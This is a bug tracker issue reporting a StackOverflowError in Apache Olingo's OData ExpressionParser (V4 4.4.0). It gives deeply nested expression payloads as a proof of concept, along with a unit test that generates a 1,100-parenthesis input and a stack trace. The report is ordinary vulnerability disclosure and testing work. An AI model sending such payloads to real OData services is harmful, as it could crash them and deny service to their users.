Details
-
Bug
-
Status: Open
-
Critical
-
Resolution: Unresolved
-
(Java) V4 4.4.0
-
None
-
None
Description
When parsing a crafted expression using the ExpressionParser (org.apache.olingo.server.core.uri.parser.ExpressionParser), a StackOverflowError is thrown.
Following are 2 expressions that I used as a POC:
- "((((((((((((((((((((..."
- "true or (true or (true or (true or (true or (true ...."
- "substring(substring(substring(substring(..."
In all cases, expression that contain 1000-2000 repetitions (depends on the stack size) of the pattern, will result in StackOverflowError.
I added the following unit test that demonstrate the issue:
Class: org.apache.olingo.server.core.uri.parser.ExpressionParserTest
private static String genPayload(int i)
{
StringBuilder sb = new StringBuilder("true");
for (int j = 0; j < i; j++)
sb.append("(");
return sb.toString();
}
@Test
public void recursion() throws Exception
{
String payload = genPayload(1100);
parseExpression(payload);
}
StackTrace:
......
at org.apache.olingo.server.core.uri.parser.ExpressionParser.parseExprMul(ExpressionParser.java:292)
at org.apache.olingo.server.core.uri.parser.ExpressionParser.parseExprAdd(ExpressionParser.java:278)
at org.apache.olingo.server.core.uri.parser.ExpressionParser.parseExprRel(ExpressionParser.java:235)
at org.apache.olingo.server.core.uri.parser.ExpressionParser.parseExprEquality(ExpressionParser.java:217)
at org.apache.olingo.server.core.uri.parser.ExpressionParser.parseAnd(ExpressionParser.java:203)
at org.apache.olingo.server.core.uri.parser.ExpressionParser.parseExpression(ExpressionParser.java:193)
at org.apache.olingo.server.core.uri.parser.ExpressionParser.parseExprValue(ExpressionParser.java:342)
at org.apache.olingo.server.core.uri.parser.ExpressionParser.parseExprPrimary(ExpressionParser.java:328)
at org.apache.olingo.server.core.uri.parser.ExpressionParser.parseExprUnary(ExpressionParser.java:323)
....